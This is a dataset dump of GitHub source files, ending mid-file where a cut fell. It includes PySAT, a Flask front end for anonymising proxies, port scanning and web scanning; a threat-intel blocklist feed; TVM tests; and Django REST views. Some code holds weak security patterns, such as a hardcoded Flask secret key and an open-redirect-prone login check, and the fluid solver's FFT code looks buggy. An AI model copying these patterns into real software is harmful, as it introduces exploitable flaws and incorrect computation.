metadata (dict) | text (string, lengths 60 to 3.49M)
---|---|
{
"source": "0xquad/attrdict",
"score": 3
} |
#### File: 0xquad/attrdict/attrdict.py
```python
__all__ = ['AttrDict', 'fromdict']
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError(k)
def __setattr__(self, k, v):
self[k] = fromdict(v) if type(v) is dict else v
def __delattr__(self, k):
del self[k]
def walk_obj(obj, parent_obj, key):
if type(obj) is dict:
for k in obj:
walk_obj(obj[k], obj, k)
parent_obj[key] = AttrDict(obj)
elif type(obj) is list:
for i, e in enumerate(obj):
walk_obj(obj[i], obj, i)
parent_obj[key] = obj
def fromdict(d):
coll = [d]
walk_obj(coll[0], coll, 0)
return coll[0]
def fromjsonfile(fn, encoding=None):
import json
with open(fn, 'r', encoding=encoding) as f:
return fromdict(json.load(f))
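# Hypothetical usage sketch (editor's addition, not part of the original file):
#   cfg = fromdict({'db': {'host': 'localhost', 'port': 5432}})
#   assert cfg.db.host == 'localhost'
#   cfg.cache = {'ttl': 60}   # __setattr__ converts assigned plain dicts too
#   assert cfg.cache.ttl == 60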
``` |
{
"source": "0xquad/flask-app-template",
"score": 2
} |
#### File: flask-app-template/app.tmpl/views.py
```python
import json
from flask import Blueprint, request, url_for, jsonify, redirect, abort, current_app as app, session
from flask_genshi import Genshi, render_template
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy import literal, text, and_, or_
from sqlalchemy.orm import aliased
from sqlalchemy.orm.exc import NoResultFound
from .models import *
app_bp = Blueprint(app.name, app.name, static_folder='static')
genshi = Genshi(app)
genshi.extensions['html'] = 'html5'
_orig_url_for = url_for
def url_for(name, *args, **kwargs):
return _orig_url_for(app.name + '.' + name, *args, **kwargs)
def render(template, **kwargs):
"""Render a Genshi template with some extra helpers."""
kwargs.update({
'static' : lambda res: url_for('static', filename=res),
'current_user' : current_user,
})
return render_template(template, kwargs)
@app_bp.route('/')
def home():
"""Display homepage"""
return render('home.html')
def validate_user_login(user_id, passwd):
profile = UserProfile.query.filter_by(email_addr=user_id).first()
validated = profile and profile.check_password(passwd)
if validated:
login_user(profile)
return validated
def check_safe_url(url):
pass
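    # A minimal sketch of what this stub might verify (editor's assumption),
    # so the ?next= parameter cannot redirect off-site:
    #   from urllib.parse import urlparse
    #   parts = urlparse(url)
    #   return not parts.scheme and not parts.netloc and url.startswith('/')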
@app_bp.route('/login', methods=['GET', 'POST'])
def login():
email = None
error = None
if request.method == 'POST':
email = request.form.get('email', None)
password = request.form.get('password', None)
if validate_user_login(email, password):
# the 'next' parameter is automatically added to the URL
# when the user accesses a route with @login_required while
# not authenticated
next_url = request.args.get('next', '')
#check_safe_url(next_url)
if not next_url.startswith('/'):
next_url = None
return redirect(next_url or url_for('home'))
else:
error = 'Invalid credentials.'
return render('login.html', email=email, error=error)
@app_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('home'))
``` |
{
"source": "0xrabbyte/taichi_simple_fluid_solver",
"score": 2
} |
#### File: 0xrabbyte/taichi_simple_fluid_solver/fft_fluid_solver.py
```python
import taichi as ti
import numpy as np
lin_iters = 20
N = 64
dt = 0.1
diff = 0.0
visc = 0.0
force = 5e5
source = 100.0
dvel = False
v = ti.Vector.field(2, float, shape=(N + 2, N + 2), offset = (-1, -1))
v_prev = ti.Vector.field(2, float, shape=(N + 2, N + 2), offset = (-1, -1))
dens = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
dens_prev = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
div = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
p = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
pixels = ti.field(float, shape=(N, N))
@ti.kernel
def add_source(a : ti.template(), b : ti.template()):
for i, j in a:
a[i, j] += dt * b[i, j]
@ti.kernel
def swap(a : ti.template(), b : ti.template()):
for i, j in a:
a[i, j], b[i, j] = b[i, j], a[i, j]
@ti.func
def set_bnd(x : ti.template()):
for i in range(N):
x[-1, i] = x[0, i]
x[N, i] = x[N - 1, i]
x[i, -1] = x[i, 0]
x[i, N] = x[i, N - 1]
x[-1, -1] = (x[0, -1] + x[-1, 0]) / 2.0
x[-1, N] = (x[0, N] + x[-1, N - 1]) / 2.0
x[N, -1] = (x[N - 1, -1] + x[N, 0]) / 2.0
x[N, N] = (x[N - 1, N] + x[N, N - 1]) / 2.0
@ti.kernel
def lin_solve(x : ti.template(), x0 : ti.template(), a : float, c : float):
for i, j in ti.ndrange(N, N):
x[i, j] = (x0[i, j] + a * (x[i - 1, j] + x[i + 1, j] + x[i, j - 1] + x[i, j + 1])) / c
set_bnd(x)
def diffuse(a, a_prev, diff):
k = dt * diff * N * N
for t in range(lin_iters):
lin_solve(a, a_prev, k, 1.0 + 4.0 * k)
@ti.kernel
def advect(d : ti.template(), d0 : ti.template(), v : ti.template() ):
dt0 = dt * N
for i, j in ti.ndrange(N, N):
x, y = i - dt0 * v[i, j][0], j - dt0 * v[i, j][1]
if (x < 0.5): x = 0.5
if (x > N + 0.5): x = N + 0.5
i0, i1 = int(x), int(x) + 1
if (y < 0.5): y = 0.5
if (y > N + 0.5): y = N + 0.5
j0, j1 = int(y), int(y) + 1
s1, s0, t1, t0 = x - i0, i1 - x, y - j0, j1 - y
d[i, j] = s0 * (t0 * d0[i0, j0] + t1 * d0[i0, j1]) + s1 * (t0 * d0[i1, j0] + t1 * d0[i1, j1])
set_bnd(d)
def fft_project(v):
u0 = np.zeros(shape = (N + 2, N))
v0 = np.zeros(shape = (N + 2, N))
for i, j in ti.ndrange(N, N):
u0[i, j], v0[i, j] = v[i, j][0], v[i, j][1]
u0 = np.fft.fft2(u0)
v0 = np.fft.fft2(v0)
for i, j in ti.ndrange(N + 2, N):
x, y = i, j
if j > N // 2 : j = j - N
r = x * x + y * y
if (r == 0.0): continue
        f = np.exp(-r * dt * visc)
        U, V = u0[i, j], v0[i, j]
        u0[i, j] = f * complex((1 - x * x / r) * U.real + (-x * y / r) * V.real, (1 - x * x / r) * U.imag + (-x * y / r) * V.imag)
        v0[i, j] = f * complex((-y * x / r) * U.real + (1 - y * y / r) * V.real, (-y * x / r) * U.imag + (1 - y * y / r) * V.imag)
u0 = np.fft.ifft2(u0)
v0 = np.fft.ifft2(v0)
f = 1.0/(N*N)
for i, j in ti.ndrange(N, N):
        v[i, j][0], v[i, j][1] = f * u0[i, j].real, f * v0[i, j].real
print("Okay")
def dens_step():
add_source(dens, dens_prev)
swap(dens, dens_prev)
diffuse(dens, dens_prev, diff)
swap(dens, dens_prev)
advect(dens, dens_prev, v)
def vel_step():
add_source(v, v_prev)
swap(v, v_prev)
diffuse(v, v_prev, visc)
fft_project(v)
swap(v, v_prev)
advect(v, v_prev, v_prev)
fft_project(v)
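# Hypothetical driver loop (editor's sketch, not part of the original file).
# Note ti.init(arch=...) must run before the field definitions above; a
# typical Stam-style stepping order would be:
#   gui = ti.GUI('fft fluid', res=(N, N))
#   while gui.running:
#       vel_step()
#       dens_step()
#       for i, j in ti.ndrange(N, N):
#           pixels[i, j] = dens[i, j]
#       gui.set_image(pixels)
#       gui.show()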
``` |
{
"source": "0xRainy/raindrops-rl",
"score": 2
} |
#### File: 0xRainy/raindrops-rl/collision.py
```python
class Collision:
def __init__(self, solid):
self.solid = solid
``` |
{
"source": "0xRauros/PySAT",
"score": 2
} |
#### File: PySAT/application/app.py
```python
from flask import Flask, render_template, redirect, url_for, request
from flask_socketio import SocketIO, send, emit
from modules.anon import anon_proxy
from modules.anon.anon_proxy import CustomProxy
from modules.crypto import crypto_utilities
from modules.forensics import image_utilities
from modules.forensics.image_utilities import CustomImage
from modules.scanner import web
from modules.scanner import server_scanner
import helper
import re
import os
PATH = os.path.abspath(os.getcwd())
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
app.config['DEBUG'] = False
socketio = SocketIO(app)
@app.route('/')
def index():
if helper.any_proxy():
proxy = helper.get_current_proxy()
ip = proxy.ip
else:
ip = helper.get_real_ip()
proxy=None
return render_template('index.html', ip=ip, proxy=proxy)
####################################################################
##################### ANONYMOUS IP #################################
####################################################################
@app.route('/reset_ip')
def reset_ip():
helper.remove_proxy()
return redirect(url_for('index'))
@app.route('/anon')
def anon():
proxies = anon_proxy.get_proxy_list()
    # proxies = proxies[:50]  # optionally cap the number of proxies shown
return render_template('anon/anon.html', nproxies=len(proxies), proxies=proxies, cproxy=None) # cproxy -> config.txt defined proxy (customproxy)
@app.route('/anon/set_proxy/<string:ip>/<string:port>/<string:country>/<string:anonymous>', methods=['GET', 'POST'])
@app.route('/anon/set_proxy', methods=['GET', 'POST'])
def set_proxy(ip=None, port=None, country=None, anonymous=None):
if request.method == 'POST':
proxy_addr = request.form['proxyAddr']
if helper.is_ip_port(proxy_addr):
ip = proxy_addr.split(':')[0]
port = proxy_addr.split(':')[1]
            proxy = CustomProxy(ip, port, 'unknown', 'unknown')
else:
return redirect(url_for('anon'))
else:
proxy = CustomProxy(ip, port, country, anonymous)
proxy_works = helper.test_proxy_connection(proxy)
if proxy_works:
helper.config_proxy(proxy) # init proxy.txt
return redirect(url_for('index'))
return redirect(url_for('anon'))
####################################################################
##################### NETWORKING ###################################
####################################################################
@app.route('/networking')
def networking():
return render_template('networking/networking.html')
####################################################################
##################### CRYPTOGRAPHY #################################
####################################################################
@app.route('/crypto')
def crypto():
hash_types = crypto_utilities.get_hash_types()
encodings = crypto_utilities.get_encodings()
decoders = crypto_utilities.get_decoders()
return render_template('crypto/crypto.html', hash_types=hash_types, encodings=encodings, decoders=decoders)
@socketio.on('hash identify')
def handle_hash_check(hash):
identifier = crypto_utilities.hash_identifier(hash)
if identifier:
result = ', '.join(identifier)
else:
result = 'Match not found :('
emit('hash identify', result)
@socketio.on('text to hash')
def handle_text_to_hash(text_hash):
text = text_hash.split('[flag]')[0]
type = text_hash.split('[flag]')[1]
hash = crypto_utilities.text_to_hash(text, type)
if hash is not None:
result = hash
else:
result = 'Error'
emit('text to hash', result)
@socketio.on('text to encode')
def handle_text_to_encode(text_encoder):
text = text_encoder.split('[flag]')[0]
encoder = text_encoder.split('[flag]')[1]
code = crypto_utilities.text_to_encode(text, encoder)
emit('text to encode', code)
@socketio.on('decode code')
def handle_decode_code(code_decoder):
code = code_decoder.split('[flag]')[0]
decoder = code_decoder.split('[flag]')[1]
text = crypto_utilities.decode_code(code, decoder)
print(text)
if text is None:
text = 'Unable to decode...'
emit('decode code', text)
####################################################################
##################### FORENSICS ####################################
####################################################################
@app.route('/forensics')
@app.route('/forensics/pdfs')
@app.route('/forensics/virus')
def forensics():
template = 'forensics/forensics.html'
if 'pdfs' in request.path:
template = 'forensics/pdfs.html'
elif 'virus' in request.path:
template = 'forensics/virus.html'
return render_template(template)
@app.route('/forensics/images')
@app.route('/forensics/images/<id>')
def forensics_images(id=None):
images_tuple = helper.get_images() # list of images (image_name, full_path)
images_name = images_tuple[0]
images_path = images_tuple[1]
images_to_exif = []
size = len(images_path)
for i in range(size):
image_to_exif = CustomImage(images_name[i], images_path[i])
        if image_to_exif.exif:
images_to_exif.append(image_to_exif)
if id is None:
return render_template('forensics/images.html', images=images_to_exif, size=size)
image = images_to_exif[int(id)]
return render_template('forensics/image.html', image=image, id=id) # Specific image
####################################################################
##################### SCANNER ######################################
####################################################################
@app.route('/scanner')
def scanner():
return render_template('scanner/scanner.html')
####################################################################
##################### SERVER SCANNER ###############################
####################################################################
@app.route('/scanner/server')
def port_scanner():
anon = False
if helper.any_proxy():
anon = True
return render_template('scanner/servers.html', anon=anon)
@socketio.on('scan server')
def scan_server(host):
scanner_data = helper.parse_server_scanner_data(host)
if scanner_data is not None:
scan_info = server_scanner.load_port_scanner(scanner_data[1], scanner_data[2], scanner_data[3], scanner_data[4])
threads = str(scan_info['threads'])
ports_list = scan_info['ports']
time = str(scan_info['time'])
banner_list = scan_info['banner']
        # port parse: join ports with ':' and port/banner pairs with '[flag]'
        ports = ':'.join(str(port) for port in ports_list)
        port_banner = [str(ports_list[i]) + '[banner]' + str(banner_list[i]) for i in range(len(ports_list))]
        port_banner_data = '[flag]'.join(str(pb) for pb in port_banner)
        # data sending via sockets
emit('time', time)
emit('threads', threads)
emit('banner', port_banner_data)
# 4 ip geolocation info and map displaying
if scanner_data[0] == 'ipgps':
lat_long = server_scanner.get_gps(scanner_data[1])
data = str(lat_long[0])+':'+str(lat_long[1])
emit('ipgps', data)
print(data)
else:
pass
else:
        emit('scan server', 'Target Error: wrong input format.')
####################################################################
##################### WEB SCANNER ##################################
####################################################################
@app.route('/scanner/web')
def web_scanner():
anon = False
if helper.any_proxy():
anon = True
username = helper.get_pc_user()
return render_template('scanner/web.html', username=username, anon=anon)
@socketio.on('scan web')
def scan_web(param):
    params = param.split(':')  # careful with the http/s <:>
helper.load_web_scanner(params)
####################################################################
##################### HELP #########################################
####################################################################
@app.route('/help')
def help():
return render_template('help/help.html')
@app.errorhandler(404)
def page_not_found(error):
return render_template('page_not_found.html', error=error)
if __name__ == '__main__':
socketio.run(app)
``` |
{
"source": "0xReki/protonfixes",
"score": 2
} |
#### File: protonfixes/gamefixes/39210.py
```python
from protonfixes import util
import os
def main():
""" FFXIV add NOSTEAM option.
"""
# Fixes the startup process.
if 'NOSTEAM' in os.environ:
util.replace_command('-issteam', '')
# Runs XIVLauncher instead of Stock Launcher
if 'XL_WINEONLINUX' in os.environ:
util.set_environment('PROTON_SET_GAME_DRIVE', '1')
util.protontricks_proton_5('dotnet48')
util.protontricks('vcrun2019')
util.replace_command('common/FINAL FANTASY XIV Online/boot/ffxivboot.exe', 'compatdata/39210/pfx/drive_c/users/steamuser/AppData/Local/XIVLauncher/XIVLauncher.exe')
util.replace_command('-issteam', '')
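    # (Editor's note) protonfixes resolves this module by Steam appid (39210)
    # and calls main() before launch; the branches above would be driven by
    # launch options such as: NOSTEAM=1 XL_WINEONLINUX=1 %command%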
``` |
{
"source": "0xRet/yeti",
"score": 3
} |
#### File: feeds/public/blocklistde_sip.py
```python
import logging
from datetime import timedelta, datetime
from core.errors import ObservableValidationError
from core.feed import Feed
from core.observables import Ip
class BlocklistdeSIP(Feed):
default_values = {
"frequency": timedelta(hours=1),
"name": "BlocklistdeSIP",
"source": "https://lists.blocklist.de/lists/sip.txt",
"description": "All IP addresses that tried to login in a SIP-, VOIP- or Asterisk-Server and are inclueded in the IPs-List from http://www.infiltrated.net/ (Twitter).",
}
def update(self):
for line in self.update_lines():
self.analyze(line)
def analyze(self, line):
ip = line.strip()
context = {"source": self.name, "date_added": datetime.utcnow()}
try:
obs = Ip.get_or_create(value=ip)
obs.add_context(context, dedup_list=["date_added"])
obs.add_source(self.name)
obs.tag("blocklistde")
obs.tag("sip")
except ObservableValidationError as e:
logging.error(e)
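    # (Editor's note) The feed is one IPv4 address per line; analyze() strips
    # each line and relies on Ip.get_or_create raising
    # ObservableValidationError for malformed entries, which is logged above.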
``` |
{
"source": "0xreza/tvm",
"score": 2
} |
#### File: python/unittest/test_target_codegen_vm_basic.py
```python
import tvm
from tvm import te
import numpy as np
def run_jit(fapi, check):
for target in ["llvm", "stackvm"]:
if not tvm.runtime.enabled(target):
continue
f = tvm.driver.build(fapi, target=target)
s = f.get_source()
check(f)
def MakeAPILegacy(stmt, name, args, num_unpacked_args, noalias):
"""Legacy adapter to create a API"""
f = tvm.tir.PrimFunc(args, stmt).with_attr(
"global_symbol", tvm.runtime.String(name))
f = f.with_attr("tir.is_entry_func", True)
if noalias:
f = f.with_attr("tir.noalias", True)
mod = tvm.IRModule.from_expr(f)
return tvm.tir.transform.MakePackedAPI()(mod)
def test_stack_vm_basic():
a = tvm.nd.array(np.zeros(10, dtype='float32'))
@tvm.register_func
def tvm_call_back_get_shape(shape0):
print(shape0)
assert shape0 == a.shape[0]
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), "float32")
stmt = tvm.tir.Evaluate(tvm.tir.call_packed("tvm_call_back_get_shape", Ab.shape[0]))
fapi = tvm.testing.MakeAPILegacy(stmt, "print_shape", [Ab], 0, True)
run_jit(fapi, lambda f: f(a))
@tvm.register_func
def tvm_stack_vm_print(*x):
print(x)
def test_stack_vm_loop():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
i = te.size_var('i')
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n - 1, "i") as i:
A[i + 1] = A[i] + 1
ib.emit(tvm.tir.call_packed("tvm_stack_vm_print", i))
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "ramp", [Ab], 0, True)
a = tvm.nd.array(np.zeros(10, dtype=dtype))
def check(f):
f(a)
np.testing.assert_equal(a.asnumpy(), np.arange(a.shape[0]))
run_jit(fapi, check)
def test_stack_vm_cond():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n - 1, "i") as i:
with ib.if_scope(tvm.tir.EQ(i, 4)):
A[i + 1] = A[i] + 1
with ib.else_scope():
A[i + 1] = A[i] + 2
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "test", [Ab], 0, True)
def check(f):
a = tvm.nd.array(np.zeros(10, dtype=dtype))
f(a)
y = np.arange(a.shape[0]) * 2
y[5:] -= 1
np.testing.assert_equal(a.asnumpy(), y)
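        # (Editor's note) A[0] stays 0; the EQ(i, 4) branch adds 1 only once,
        # so A[i] == 2*i for i <= 4 and A[i] == 2*i - 1 afterwards, matching
        # the arange-based expectation built above.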
run_jit(fapi, check)
def test_vm_parallel():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
i = te.size_var('i')
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n, "i", for_type="parallel") as i:
A[i] = A[i] + 1
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "ramp", [Ab], 0, True)
def check(f):
a = tvm.nd.array(np.zeros(10, dtype=dtype))
f(a)
np.testing.assert_equal(a.asnumpy(), np.ones(a.shape[0]))
run_jit(fapi, check)
if __name__ == "__main__":
test_vm_parallel()
test_stack_vm_loop()
test_stack_vm_basic()
test_stack_vm_cond()
```
#### File: python/unittest/test_tir_pass_inject_double_buffer.py
```python
import tvm
from tvm import te
def test_double_buffer():
dtype = 'int64'
n = 100
m = 4
tx = te.thread_axis("threadIdx.x")
ib = tvm.tir.ir_builder.create()
A = ib.pointer("float32", name="A")
C = ib.pointer("float32", name="C")
ib.scope_attr(tx, "thread_extent", 1)
with ib.for_range(0, n) as i:
B = ib.allocate("float32", m, name="B", scope="shared")
with ib.new_scope():
ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
with ib.for_range(0, m) as j:
B[j] = A[i * 4 + j]
with ib.for_range(0, m) as j:
C[j] = B[j] + 1
stmt = ib.get()
stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
stmt = tvm.tir.ir_pass.Simplify(stmt)
assert isinstance(stmt.body.body, tvm.tir.Allocate)
assert stmt.body.body.extents[0].value == 2
mod = tvm.IRModule({
"db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
})
f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
count = [0]
def count_sync(op):
if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
count[0] += 1
tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
assert count[0] == 4
if __name__ == "__main__":
test_double_buffer()
``` |
{
"source": "0xRuFFy/python_Flappy-Bird",
"score": 2
} |
#### File: src/ai/generation.py
```python
from typing import List, Tuple
from pyglet.graphics import Batch, OrderedGroup
from pyglet.text import Label
from src.data_loader import Assets, JsonData
from src.scoreBoard import ScoreBoard
from src.ai.ai_bird import Ai_Bird
from src.pipe import Pipe
class infoText(Label):
def __init__(self, text, value=0, x=0, y=0, batch=None, group=None):
super().__init__(
text=f"{text}: {value}",
font_name="Arial",
font_size=15,
color=(255, 255, 255, 255),
x=x,
y=y,
anchor_x="left",
anchor_y="baseline",
batch=batch,
group=group,
)
self.info = text
def updateValue(self, value) -> None:
self.text = f"{self.info}: {value}"
class Generation:
def __init__(
self,
size: int,
bird_setup: Tuple,
pipe_setup: Tuple,
batch: Batch,
uigroup: OrderedGroup,
jData: JsonData,
assets: Assets,
) -> None:
self.birds: List[Ai_Bird] = [Ai_Bird(*bird_setup) for _ in range(size)]
self.pipes: List[Pipe] = [
Pipe(*(pipe_setup), index=0, birds=self.birds, mode="learn"),
Pipe(*(pipe_setup), index=1, birds=self.birds, mode="learn"),
]
self.pipes[1].wrapAround(self.pipes[0], force=True)
self.pipe_setup = pipe_setup
self.gen = 1
self.maxScore = 0
self.scoreBoard = ScoreBoard(assets, jData, batch, uigroup)
self.info: List[infoText] = [
infoText("Gen", value=self.gen, x=10, y=60, batch=batch, group=uigroup),
infoText("maxScore", value=self.maxScore, x=10, y=40, batch=batch, group=uigroup),
]
def update(self, dt: float = 0) -> None:
self.set_birds_input_layer()
d_count = 0
for bird in self.birds:
if bird.alive:
bird._update(dt=dt)
if bird.score >= self.scoreBoard.score:
self.scoreBoard.score = bird.score
self.scoreBoard.update()
else:
d_count += 1
if bird.visible:
bird.visible = False
if d_count == len(self.birds):
self.create_next_gen()
self.pipes[0].update(self.pipes[1], dt=dt)
self.pipes[1].update(self.pipes[0], dt=dt)
def set_birds_input_layer(self) -> None:
next_pipe: Pipe = self.get_next_pipe()
for bird in self.birds:
if bird.alive:
top = next_pipe.upper.y - bird.y - bird.height
right = next_pipe.lower.x - bird.x - bird.width
bot = bird.y - next_pipe.lower.y - next_pipe.lower.height
left = bird.x - next_pipe.lower.x - next_pipe.lower.width
bird.set_input_layer([top, bot, right, left])
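        # (Editor's note) The four inputs are the bird's clearances to the
        # next pipe pair (space above, space below, distance ahead, distance
        # behind): an egocentric view fed to the network each frame.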
def get_next_ancestor(self) -> Tuple[List[float], bool]:
best = -1
best_id: int
for i, bird in enumerate(self.birds):
bird.get_fitnes(pipe=self.get_next_pipe())
if bird.fitnes > best:
best = bird.fitnes
best_id = i
if best == -1:
raise IndexError("No Bird has a fitnes")
return (self.birds[best_id].get_gens(), self.birds[best_id].fitnes < -.1)
def create_next_gen(self) -> None:
self.gen += 1
self.info[0].updateValue(self.gen)
if self.scoreBoard.score > self.maxScore:
self.maxScore = self.scoreBoard.score
self.info[1].updateValue(self.maxScore)
self.scoreBoard.score = 0
self.scoreBoard.update()
temp = self.get_next_ancestor()
anc = temp[0]
self.birds[0]._reset(anc, copy=True)
for bird in self.birds[1:]:
bird._reset(anc, reinit=temp[1])
del self.pipes
self.pipes: List[Pipe] = [
Pipe(*(self.pipe_setup), index=0, birds=self.birds, mode="learn"),
Pipe(*(self.pipe_setup), index=1, birds=self.birds, mode="learn"),
]
self.pipes[1].wrapAround(self.pipes[0], force=True)
def get_next_pipe(self) -> Pipe:
return self.pipes[0] if self.pipes[0].positionID == 0 else self.pipes[1]
``` |
{
"source": "0xRumple/happy",
"score": 2
} |
#### File: happy/accounts/views.py
```python
import os, requests
from rest_framework import viewsets, generics
from rest_framework.generics import GenericAPIView, RetrieveUpdateAPIView
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from fun.permissions import IsOwnerOrReadOnlyUser
from rest_framework.response import Response
from rest_framework.decorators import action
from rest_framework import status
from django.shortcuts import get_object_or_404
from posts.serializers import PostSerializer
from posts.models import Post
from posts.pagination import PostsLimitOffsetPagination, PostsPageNumberPagination
from rest_framework import serializers
# from rest_framework import permissions
from allauth.account.views import PasswordResetFromKeyView as PRV
from allauth.account.utils import perform_login
from allauth.socialaccount.providers.facebook.views import FacebookOAuth2Adapter
from rest_auth.registration.views import SocialLoginView
from rest_auth.views import LogoutView as LV
from rest_auth.registration.views import VerifyEmailView as VEV
from rest_auth.models import TokenModel
from rest_auth.app_settings import create_token
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth import logout as django_logout
from django.utils.translation import ugettext_lazy as _
from django.urls import reverse_lazy
from .models import Profile, Link
from .filters import UserFilter
from django.contrib.auth.models import User
from .serializers import (UserSerializer,
UserSocialLinksSerializer,
ProfileSerializer,
ResendConfirmSerializer,
UserDetailsSerializer,
TokenSerializer)
class UserProfileView(generics.RetrieveUpdateAPIView):
serializer_class = ProfileSerializer
def get_object(self):
user = self.request.user
profile = Profile.objects.get(id=user.id)
return profile
class UserSocialLinksViewSet(generics.RetrieveUpdateAPIView):
queryset = Link.objects.all()
serializer_class = UserSocialLinksSerializer
permission_classes = (IsAuthenticated,
IsOwnerOrReadOnlyUser, )
def get_object(self):
user = self.request.user
profile = Profile.objects.get(user_id=user.id)
links = Link.objects.get(user_id=profile.id)
return links
class UserPostsView(generics.ListAPIView):
serializer_class = PostSerializer
pagination_class = PostsPageNumberPagination
def get_queryset(self):
user = self.request.user
posts = Post.objects.filter(author_id=user.id)
return posts
class UserDetailsView(RetrieveUpdateAPIView):
serializer_class = UserDetailsSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user
user_details_view = UserDetailsView.as_view()
class LogoutView(LV):
def logout(self, request):
try:
request.user.auth_token.delete()
except (AttributeError, ObjectDoesNotExist):
pass
django_logout(request)
return Response({"detail": _("Successfully logged out.")},
status=status.HTTP_200_OK)
logout_view = LogoutView.as_view()
class ResendConfirmView(GenericAPIView):
serializer_class = ResendConfirmSerializer
def post(self, request, *args, **kwargs):
# Create a serializer with request.data
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
# Return the success message with OK HTTP status
return Response(
{"detail": _("Confirmation e-mail has been sent.")},
status=status.HTTP_200_OK
)
resend_confirmation_view = ResendConfirmView.as_view()
class VerifyEmailView(VEV):
token_model = TokenModel
def post(self, request, *args, **kwargs):
self.serializer = self.get_serializer(data=request.data)
self.serializer.is_valid(raise_exception=True)
self.kwargs['key'] = self.serializer.validated_data['key']
confirmation = self.get_object()
confirmation.confirm(self.request)
self.login_on_confirm(confirmation)
return self.get_response()
def login_on_confirm(self, confirmation):
self.user = confirmation.email_address.user
if self.user and self.request.user.is_anonymous:
return perform_login(self.request,
self.user,
'none')
def get_response(self):
token = create_token(self.token_model, self.user, self.serializer)
serializer_class = TokenSerializer
serializer = serializer_class(instance=token,
context={'request': self.request})
return Response(serializer.data, status=status.HTTP_200_OK)
verify_email = VerifyEmailView.as_view()
class FacebookLogin(SocialLoginView):
adapter_class = FacebookOAuth2Adapter
class GetUserProfile(viewsets.ModelViewSet):
serializer_class = PostSerializer
permission_classes = (IsAuthenticatedOrReadOnly,)
queryset = User.objects.all()
pagination_class = PostsPageNumberPagination
def retrieve(self, request, username=None):
queryset = User.objects.all()
user = get_object_or_404(queryset, username=username)
serializer = UserDetailsSerializer(user, context={'request': request})
return Response(serializer.data)
@action(detail=False, methods= ["get"])
def posts(self, request, username=None):
queryset = self.filter_queryset(self.get_queryset())
user = get_object_or_404(queryset, username=username)
posts = Post.objects.filter(author_id=user.id)
page = self.paginate_queryset(posts)
if page is not None:
serializer = self.get_serializer(page, many=True, context={"request":request})
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(posts, many=True, context={"request":request})
return Response(serializer.data)
class UsersListView(viewsets.ModelViewSet):
queryset = User.objects.all()
serializer_class = UserSerializer
filterset_class = UserFilter
pagination_class = PostsPageNumberPagination
def list(self, request):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True, context={"request":request})
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True, context={"request":request})
return Response(serializer.data)
```
#### File: happy/posts/serializers.py
```python
from rest_framework import serializers
from django.core.exceptions import ValidationError
from collections import OrderedDict
from django.conf import settings
from django.utils.module_loading import import_string
from posts.pagination import CommentsPageNumberPagination, PostsPageNumberPagination
from django.db.models import Count
from django.contrib.auth.models import User
from .models import Post
from comments.models import Comment
from comments.serializers import TopCommentSerializer, CommentSerializer
class PostSerializer(serializers.ModelSerializer):
author = serializers.ReadOnlyField(source='author.username')
author_avatar = serializers.SerializerMethodField()
time_since = serializers.ReadOnlyField(source='FORMAT')
comments_count = serializers.SerializerMethodField()
likes_count = serializers.SerializerMethodField()
dislikes_count = serializers.SerializerMethodField()
top_comment = serializers.SerializerMethodField()
reaction = serializers.SerializerMethodField()
class Meta:
"""
extra_kwargs = {'likes': {'read_only': True},
'dislikes': {'read_only': True}
}
"""
model = Post
fields = ("id","author","author_avatar","time_since",
"reaction","content","likes_count","dislikes_count",
"mediafile","comments_count","top_comment")
def get_author_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj.author, size)
if avatar_url:
return avatar_url
    def validate(self, data):
        if len(data['content']) <= 0 and data['mediafile'] is None:
            raise serializers.ValidationError(u'at least one field is required')
        return data
def get_comments_count(self, post):
""" get the number of comments for single post """
return Comment.objects.filter(parent=post).count()
    def get_top_comment(self, post):
        data = Comment.objects.filter(parent=post).annotate(
            like_count=Count('likes')).order_by('-like_count').first()
        if data is None:
            return None
        return TopCommentSerializer(data).data
def get_likes_count(self,post):
return post.likes_count()
def get_dislikes_count(self, post):
return post.dislikes_count()
def get_reaction(self, post):
reaction = None
request = self.context.get("request")
if request and hasattr(request, "user"):
if post.likes.filter(id=request.user.id).exists():
reaction = 'liked'
elif post.dislikes.filter(id=request.user.id).exists():
reaction = 'disliked'
return reaction
""" def to_representation(self, instance):
